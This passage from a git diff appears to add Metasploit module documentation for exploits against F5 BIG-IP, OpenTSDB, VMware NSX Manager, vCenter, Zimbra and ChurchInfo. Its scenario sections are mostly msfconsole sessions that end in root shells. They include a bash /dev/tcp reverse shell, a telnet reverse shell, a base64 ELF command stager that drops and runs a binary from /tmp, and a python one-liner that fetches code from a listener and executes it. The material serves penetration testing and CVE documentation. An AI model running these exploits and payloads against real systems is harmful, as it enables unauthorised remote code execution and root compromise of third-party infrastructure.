+TARGET => 1
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/ePg5ECHuVD
+[*] Server started.
+
+[...wait for an authenticated user to click the link...]
+
+[*] Redirecting the admin to overwrite /var/run/config/timeout.sh; if successful, your session will come the next time a user logs in interactively
+```
+
+Once again, if you already have access, you can verify it worked:
+
+```
+[root@bigip:Active:Standalone] config # cat /etc/profile.d/timeout.sh 
+echo exec\(__import__\(\'base64\'\).b64decode[...]
+```
+
+Then, when a user logs in (ie, `ssh root@<target>` or on the console), you get
+a session:
+
+```
+[*] Redirecting the admin to overwrite /var/run/config/timeout.sh; if successful, your session will come the next time a user logs in interactively
+
+[...wait for a user to log in..]
+
+[*] Sending stage (40168 bytes) to 10.0.0.162
+[+] Deleted /var/run/config/timeout.sh
+[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:43902) at 2022-11-14 15:32:26 -0800
+
+meterpreter > getuid
+Server username: root
+```
+
+### F5 Big-IP 17.0.0.1 - Target 2 (Custom)
+
+Once again, set up the server:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET_HOST 10.0.0.162
+TARGET_HOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET 2
+TARGET => 2
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set FILENAME /tmp/testmsfmodule
+FILENAME => /tmp/testmsfmodule
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/PLvOVjkiVvXX
+[*] Server started.
+
+[...wait for an admin to visit that link...]
+
+[*] Redirecting the admin to overwrite /tmp/testmsfmodule with the payload
+```
+
+You can verify the file exists:
+
+```
+# cat /tmp/testmsfmodule 
+echo exec\(__import__\(\'base64\'\).b64decode[...]
+```
+
+Note that while this is written by root, you're in a pretty strict SELinux
+context so most obvious attacks (like writing to /etc/profile.d, /root/.ssh,
+etc., won't work).
@@ -19,6 +19,7 @@ For testing purposes, you can download a Github Enterprise image from the follow

 This module was specifically tested against version 2.8.0, which can be downloaded here:

+Download links are provided for reference only and are not maintained by the project. Utilize at your own risk!
 [https://github-enterprise.s3.amazonaws.com/esx/releases/github-enterprise-2.8.0.ova](https://github-enterprise.s3.amazonaws.com/esx/releases/github-enterprise-2.8.0.ova)

 Before you install the image, you must have a valid key. Start from here:
@@ -2,8 +2,9 @@

 Download the vulnerable version of OVA or ISO file from following URL. I strongly suggest you to choose OVA.

-[http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova](http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova)
-[http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso](http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso)
+Download links are provided for reference only and are not maintained by the project. Utilize at your own risk!
+http://s3-eu-west-1.amazonaws.com/innotim/Logsign.ova
+http://s3-eu-west-1.amazonaws.com/innotim/forest-4.4.1-12.04.iso

 ### Creating A Testing Environment

@@ -76,4 +77,4 @@ dns-nameservers 8.8.8.8
 meterpreter > getuid
 Server username: root
 meterpreter >
-```
+```
@@ -0,0 +1,149 @@
+## Vulnerable Application
+This module exploits an unauthenticated command injection vulnerability in the yrange parameter
+in OpenTSDB through 2.4.0 (CVE-2020-35476) in order to achieve unauthenticated remote code execution as the root user.
+
+The module first attempts to obtain the OpenTSDB version via the api. If the version is 2.4.0 or lower,
+the module performs additional checks to obtain the configured metrics and aggregators.
+It then randomly selects one metric and one aggregator and uses those to instruct the target server to plot a graph.
+As part of this request, the yrange parameter is set to the payload, which will then be executed by the target if the latter is vulnerable.
+
+This module has been successfully tested against OpenTSDB version 2.3.0.
+
+## Installation Information
+OpenTSDB is open source software. Vulnerable releases are available [here](https://github.com/OpenTSDB/opentsdb/releases).
+Documentation and installation instructions are available [here](http://opentsdb.net/docs/build/html/index.html).
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use exploit/linux/http/opentsdb_yrange_cmd_injection`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set LHOST [IP]`
+5. Do: `set SRVHOST [IP]`
+6. Do: `exploit`
+
+## Options
+### TARGETURI
+The base path to OpenTSDB. The default value is `/`.
+
+## Targets
+```
+Id  Name
+--  ----
+0   Automatic (Unix In-Memory)
+1   Automatic (Linux Dropper)
+```
+
+## Scenarios
+### OpenTSDB 2.3.0 - Linux target
+```
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > options
+
+Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.10.1.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      4242             yes       The target port (TCP)
+   SRVHOST    10.10.1.30       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0
+                                         .0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to OpenTSDB
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.10.1.30       yes       The listen address (an interface may be specified)
+   LPORT  1312             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Automatic (Linux Dropper)
+
+
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > run
+
+[*] Started reverse TCP handler on 10.10.1.30:1312
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is OpenTSDB version 2.3.0
+[*] Identified 25 configured metrics. Using metric MessagePrePublishingEvents.min
+[*] Identified 31 configured aggregators. Using aggregator sum
+[*] Generated command stager: ["echo -n f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAjPAAAASgEAAAcAAAAAEAAAagpeMdv341NDU2oCsGaJ4c2Al1toCgoHJWgCAAUgieFqZlhQUVeJ4UPNgIXAeRlOdD1oogAAAFhqAGoFieMxyc2AhcB5vesnsge5ABAAAInjwesMweMMsH3NgIXAeBBbieGZsmqwA82AhcB4Av/huAEAAAC7AQAAAM2A>>'/tmp/XeJKe.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/JIulg' < '/tmp/XeJKe.b64' ; chmod +x '/tmp/JIulg' ; '/tmp/JIulg' & sleep 2 ; rm -f '/tmp/JIulg' ; rm -f '/tmp/XeJKe.b64'"]
+[*] Transmitting intermediate stager...(106 bytes)
+[*] Sending stage (1017704 bytes) to 10.10.1.1
+[*] Command Stager progress - 100.00% done (773/773 bytes)
+[*] Meterpreter session 4 opened (10.10.1.30:1312 -> 10.10.1.1:47720) at 2022-11-24 19:27:06 +0000
+
+meterpreter > getuid
+Server username: root
+```
+
+### OpenTSDB 2.3.0 - Unix target
+```
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > options
+
+Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     10.10.1.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      4242             yes       The target port (TCP)
+   SRVHOST    10.10.1.30       yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0
+                                         .0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The base path to OpenTSDB
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  10.10.1.30       yes       The listen address (an interface may be specified)
+   LPORT  1337             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic (Unix In-Memory)
+
+
+msf6 exploit(linux/http/opentsdb_yrange_cmd_injection) > run
+
+[+] sh -c '(sleep 3851|telnet 10.10.1.30 1337|while : ; do sh && break; done 2>&1|telnet 10.10.1.30 1337 >/dev/null 2>&1 &)'
+[*] Started reverse TCP double handler on 10.10.1.30:1337
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is OpenTSDB version 2.3.0
+[*] Identified 25 configured metrics. Using metric MessagePrePublishingEvents.mean_rate
+[*] Identified 31 configured aggregators. Using aggregator max
+[*] Executing the payload
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo q08IVzJKPKz8soea;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "q08IVzJKPKz8soea\r\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 3 opened (10.10.1.30:1337 -> 10.10.1.1:52370) at 2022-11-24 19:24:06 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
@@ -9,6 +9,7 @@ performs remote code execution as root by abusing the *extract* function used in

 ### Testing Environment

+Download links are provided for reference only and are not maintained by the project. Utilize at your own risk!
 Setup [Unraid 6.8.0](https://s3.amazonaws.com/dnld.lime-technology.com/stable/unRAIDServer-6.8.0-x86_64.zip)
 according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getting_Started) guide.

@@ -0,0 +1,173 @@
+## Vulnerable Application
+
+VMware Cloud Foundation contains a remote code execution vulnerability via XStream open source library [CVE-2022-39144](https://nvd.nist.gov/vuln/detail/CVE-2021-39144).
+VMware has evaluated the severity of this issue to be in the [Critical severity range](https://www.vmware.com/support/policies/security_response.html) with a maximum CVSSv3 base score of [9.8](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
+Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V),
+a malicious actor can get remote code execution in the context of `root` on the appliance.
+
+VMware Cloud Foundation `3.x` and more specific NSX Manager Data Center for vSphere up to and including version `6.4.13`
+are vulnerable to Remote Command Injection.
+
+This module has been tested against VMware NSX Manager (NSX-V) with the specifications listed below:
+
+* VMware NSX Manager
+* Version `6.4.13`
+* Version `6.4.4`
+
+## Verification Steps
+
+Follow these instructions to install a vulnerable VMware NSX Manager on VirtualBox.
+* Go to [Download VMware NSX for vSphere 6.4.13](https://customerconnect.vmware.com/en/downloads/details?downloadGroup=NSXV_6413&productId=417&rPId=96480)
+* Note: You need to be a customer with valid VMware subscriptions
+* Download the ova file `VMware-NSX-Manager-6.4.13-19307994.ova`
+* Open VirtualBox and import the ova file
+* After sucessful import, start the VM and you have a VMware NSX Manager running which is accessible using url `https://<nsx-manager-ip>`
+* Credentials to login: user: `admin`, password: `default`
+* Use the module and options below to test the vulnerability...
+
+1. `use use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-Unix command or 1-Linux Dropper>`
+1. `exploit`
+1. You should get a `bash` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+No specific options.
+
+## Scenarios
+
+### VMware NSX Manager bash reverse shell
+
+```
+msf6 > use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options
+
+Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    443              yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
+                                       ne or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set rhosts 192.168.100.5
+rhosts => 192.168.100.5
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.5:443 can be exploited !
+[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
+[*] Executing Unix (In-Memory) with bash -c '0<&44-;exec 44<>/dev/tcp/192.168.100.7/4444;sh <&44 >&44 2>&44'
+[*] Command shell session 14 opened (192.168.100.7:4444 -> 192.168.100.5:42512) at 2022-11-05 10:33:37 +0000
+
+pwd
+/usr/lib/tanuki/bin
+whoami
+root
+exit
+[*] 192.168.100.5 - Command shell session 14 closed.
+
+```
+
+### VMware NSX Manager meterpreter session
+
+```
+msf6 > use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options
+
+Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    443              yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
+                                       ne or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set rhosts 192.168.100.5
+rhosts => 192.168.100.5
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.5:443 can be exploited !
+[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
+[*] Executing Linux Dropper
+[*] Using URL: http://192.168.100.7:8080/G5xrKmpiufcQdCt
+[*] Client 192.168.100.5 (curl/7.81.0) requested /G5xrKmpiufcQdCt
+[*] Sending payload to 192.168.100.5 (curl/7.81.0)
+[*] Command Stager progress - 100.00% done (121/121 bytes)
+[*] Sending stage (3045348 bytes) to 192.168.100.5
+[*] Meterpreter session 13 opened (192.168.100.7:4444 -> 192.168.100.5:42384) at 2022-11-05 10:29:30 +0000
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.100.5
+OS           : NSX Manager 6.4.13 (Linux 4.9.297)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
+
+## Limitations
+The vulnerability check is limited in detecting that VMWare NSX Manager (NSX-V) is running without obtaining the version information.
+However all VMware NSX Manager versions up to `6.4.13` are vulnerable, except for `6.4.14`, so most detected targets are likely
+to be vulnerable.
@@ -0,0 +1,112 @@
+## Vulnerable Application
+
+This module exploits a privilege escalation in vSphere/vCenter due to improper permissions on the
+`/usr/lib/vmware-vmon/java-wrapper-vmon` file. It is possible for anyone in the
+`cis` group to write to the file, which will execute as root on `vmware-vmon` service
+restart or host reboot.
+
+This module was successfully tested against VMware VirtualCenter 6.5.0 build-7070488.
+
+The following versions should be vulnerable:
+ - vCenter 7.0 before U2c
+ - vCenter 6.7 before U3o
+ - vCenter 6.5 before U3q
+
+## Verification Steps
+
+1. Start msfconsole
+2. Obtain a shell on vCenter for a user in the `cis` group.
+3. Do: `use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc`
+4. Do: `set session #`
+5. Do: `run`
+6. Restart the host, or the service (`systemctl restart vmware-vmon.service`) with a user who has permission
+7. You should get a root shell.
+
+## Options
+
+## Scenarios
+
+### VMware VirtualCenter 6.5.0 build-7070488
+
+Get initial shell (any vic group member will do, here we use vsphere-client)
+
+```
+[*] Processing java_wrapper.rb for ERB directives.
+resource (java_wrapper.rb)> use multi/script/web_delivery
+[*] Using configured payload python/meterpreter/reverse_tcp
+resource (java_wrapper.rb)> set lhost 2.2.2.2
+lhost => 2.2.2.2
+resource (java_wrapper.rb)> run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] Using URL: http://2.2.2.2:8080/cFK3ylrNE9s
+[*] Server started.
+[*] Run the following command on the target machine:
+python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://2.2.2.2:8080/cFK3ylrNE9s', context=ssl._create_unverified_context());exec(r.read());"
+msf6 exploit(multi/script/web_delivery) > 
+[*] 1.1.1.1    web_delivery - Delivering Payload (432 bytes)
+[*] Sending stage (24380 bytes) to 1.1.1.1
+[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:59084) at 2022-11-20 10:45:06 -0500
+
+msf6 exploit(multi/script/web_delivery) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: vsphere-client
+meterpreter > sysinfo
+Computer        : localhost.ragedomain
+OS              : Linux 4.4.8 #1-photon SMP Fri Oct 21 20:13:51 UTC 2016
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > shell
+Process 6710 created.
+Channel 1 created.
+vpxd -v
+/usr/sbin/vpxd: line 34: ulimit: open files: cannot modify limit: Operation not permitted
+sed: couldn't open temporary file /etc/vmware-vpx/sedXf9kV4: Permission denied
+VMware VirtualCenter 6.5.0 build-7070488
+^Z
+Background channel 1? [y/N]  y
+meterpreter > background
+[*] Backgrounding session 1...
+```
+
+Conduct the priv esc
+
+```
+msf6 exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > set session 1
+session => 1
+msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > set verbose true
+verbose => true
+msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > jobs -K
+Stopping all jobs...
+
+[*] Server stopped.
+msf6 exploit(linux/local/vcenter_java_wrapper_vmon_priv_esc) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session architecture: python
+[*] Started reverse TCP handler on 2.2.2.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. /usr/lib/vmware-vmon/java-wrapper-vmon is writable and owned by cis group
+[+] Original /usr/lib/vmware-vmon/java-wrapper-vmon backed up to /root/.msf4/loot/20221120104723_default_1.1.1.1_javawrappervmo_605726.txt
+[*] Writing payload to /tmp/.BCOL6n
+[*] Writing '/tmp/.BCOL6n' (250 bytes) ...
+[*] Writing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon
+[*] Attempting to restart vmware-vmon service
+[-] vmware-vmon service needs to be restarted, or host rebooted to obtain shell.
+[*] Waiting 1800 seconds for shell
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045348 bytes) to 1.1.1.1
+[+] Deleted /tmp/.BCOL6n
+[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:32906) at 2022-11-20 10:47:52 -0500
+[*] Replacing trojaned /usr/lib/vmware-vmon/java-wrapper-vmon with original
+
+meterpreter > getuid
+Server username: root
+meterpreter > 
+```
@@ -1,10 +1,18 @@
 ## Vulnerable Application

-Currently, as of 2022-07-26, all versions of Zimbra are vulnerable. Presumably they'll patch it eventually - I have an open security ticket with Zimbra.
+The following versions of Zimbra are vulnerable:
+
+* Zimbra Collaboration Suite 9.0.0 Patch 26 and earlier
+* Zimbra Collaboration Suite 8.8.15 Patch 33 and earlier

 ## Verification Steps

-Install Zimbra on any supported Linux version and get a session as the `zimbra` user. I used Ubuntu 18.04 for testing, and then CVE-2022-30333 to exploit, but this will work on a fully patched system as well. Then...
+Install Zimbra on any supported Linux version and get a session as the `zimbra`
+user. The easiest way to exploit zimbra is to `rm $(which pax)`, reboot, and
+use CVE-2022-41352. Or generate a Meterpreter payload with `msfvenom` and run
+it.
+
+From there:

 ```
 msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > sessions -l
@@ -0,0 +1,164 @@
+## Vulnerable Application
+* Project Homepage: http://www.churchdb.org/
+* Project Download: https://sourceforge.net/projects/churchinfo/files/
+
+ChurchInfo is an open source PHP application used to help churches manage systems and users of the church.
+There are various vulnerabilities in the ChurchInfo software which can be exploited by an
+attacker, however this module targets an authenticated remote code execution (RCE) vulnerability
+known as CVE-2021-43258 to execute code as the web daemon user (e.g. www-data).
+
+ChurchInfo v1.2.13, v1.2.14, and v1.3.0 contain functionality to email users listed in the ChurchInfo database
+with attachments. When preparing the email, a draft of the attachment is saved into
+`/tmp_attach/`, which is a web accessible folder under the ChurchInfo web root. Before the email is sent,
+the attachment draft can be loaded in the application. By uploading a malicious PHP file
+as an attachment and then browsing to it on the web server, RCE can be achieved.
+
+This vulnerability was assigned CVE-2021-43258. Version 1.3.0 was the latest version of ChurchInfo at the time
+of writing and there is presently no known patch for this issue.
+
+### Installation
+Installation guides are available on the SourceForge site at https://sourceforge.net/projects/churchinfo/files/.
+
+The following however is a quick and easy way to get most versions of ChurchInfo up and running using Docker,
+which should make it a lot easier to setup and also clean up once you are finished testing things out.
+
+1. `wget https://master.dl.sourceforge.net/project/churchinfo/churchinfo/1.3.0/churchinfo-1.3.0.tar.gz`
+1. `tar -xvf churchinfo-1.3.0.tar.gz`
+1. `sudo docker run -i -t -p "9090:80" -v ${PWD}/churchinfo:/app mattrayner/lamp:0.8.0-1804-php7`.
+1. `sudo docker ps -a` and find the container ID that was created and which is now running.
+1. `sudo docker exec -it *container ID* /bin/bash`
+1. Inside the new prompt:
+1. `mysqladmin -u root -p create churchinfo` and press the ENTER key when prompted for the password.
+1. `cd /app/churchinfo/SQL`
+1. `mysql -u root -p churchinfo < Install.sql` and press the ENTER key when prompted for the password.
+1. `apt-get install nano` if you want to use Nano.
+1. `nano /app/churchinfo/Include/Config.php`.
+1. Set the `$sUSER` variable to `'root'`.
+1. Set the `$sPASSWORD` variable to `''`.
+1. Set the `$sRootPath` variable to `'/churchinfo'`. This should be default though.
+1. Set the `$URL[0]` to `http://localhost/churchinfo/Default.php`.
+1. Exit out of `nano` and run `/etc/init.d/apache2 restart`
+1. Log in at `http://127.0.0.1:9090/churchinfo/Default.php` with the username `Admin` and password `churchinfoadmin`.
+1. This should cause the app to redirect to a password change form.
+1. Specify the old password, aka `churchinfoadmin` and then specify the new password twice and submit the form.
+1. Go to `http://127.0.0.1:9090/churchinfo/PersonEditor.php` and fill out the form with as much detail as possible.
+1. Click "Save and Add".
+
+## Verification Steps
+This module requires authenticated access to the application. After identifying a vulnerable
+ChurchInfo application, there MUST be a person entry available within the database. If there are no person
+entries within the database, it will not be possible to create a draft email. This draft email
+will be used to place the malicious attachment into the `/tmp_attach` directory for our exploit.
+
+1. Start `msfconsole`
+1. `use exploit/multi/http/churchinfo_upload_exec`
+1. Set the target `RHOST`, `APPBASE`, `USERNAME`, and `PASSWORD` values.
+1. Optional: Set the target `RPORT` if the ChurchInfo server is running on a different port than port 80.
+1. Optional: `set SSL true` if the target is using SSL for ChurchInfo.
+1. Select the payload of choice or leave default.
+1. Set the `LHOST` to your system.
+1. Run the exploit with `run`, enjoy the shell!
+
+## Options
+There are a handful of options which can be used to further configure the attack or other environmental uses.
+
+### USERNAME
+The username of a valid user account for the ChurchInfo application. Default is `admin`.
+
+### PASSWORD
+The password for a valid user account for the ChurchInfo application. Default is `churchinfoadmin` based on documentation.
+
+### APPBASE
+The base directory path to the ChurchInfo application. This can and will likely
+vary depending on how the application was installed. Default value is `/churchinfo/`.
+
+### EMAIL_SUBJ
+The subject of the draft email used for the exploit, the email is not sent. Default value is `Read this now!`.
+
+### EMAIL_MESG
+The message on the draft email which is used for the exploit. The email is not sent. Default value is `Hello there!`.
+
+## Scenarios
+If there are no person entries in the database, the exploit will fail. To help troubleshoot, enable verbose mode with the following:
+
+```
+set verbose true
+```
+
+This will enable additional information and details about the exploit as it is launched.
+
+### ChurchInfo v1.3.0 with MySQL 5.7.35 on Ubuntu Linux 18.04.2 LTS (Docker Image)
+```
+msf6 > use exploit/multi/http/churchinfo_upload_exec
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/churchinfo_upload_exec) > set RHOST 127.0.0.1
+RHOST => 127.0.0.1
+msf6 exploit(multi/http/churchinfo_upload_exec) > set RPORT 9090
+RPORT => 9090
+msf6 exploit(multi/http/churchinfo_upload_exec) > set PASSWORD testing123
+PASSWORD => testing123
+msf6 exploit(multi/http/churchinfo_upload_exec) > show options
+
+Module options (exploit/multi/http/churchinfo_upload_exec):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   EMAIL_MESG  Hello there!     yes       Email message in webapp
+   EMAIL_SUBJ  Read this now!   yes       Email subject in webapp
+   PASSWORD    testing123       yes       Password to login with
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT       9090             yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI   /churchinfo/     yes       The location of the ChurchInfo app
+   USERNAME    admin            yes       Username for ChurchInfo application
+   VHOST                        no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.30.182.196   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Targeting
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/churchinfo_upload_exec) > set LHOST docker0
+LHOST => docker0
+msf6 exploit(multi/http/churchinfo_upload_exec) > run
+
+[*] Started reverse TCP handler on 172.18.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Target is ChurchInfo!
+[+] The target is vulnerable. Target is running ChurchInfo 1.3.0!
+[+] Logged into application as admin
+[*] Navigating to add items to cart
+[+] Items in Cart: Items in Cart: 2
+[+] Uploading exploit via temp email attachment
+[+] Exploit uploaded to /churchinfo/tmp_attach/ueNYs9.php
+[+] Executing payload with GET request
+[*] Sending stage (39927 bytes) to 172.18.0.2
+[+] Deleted ueNYs9.php
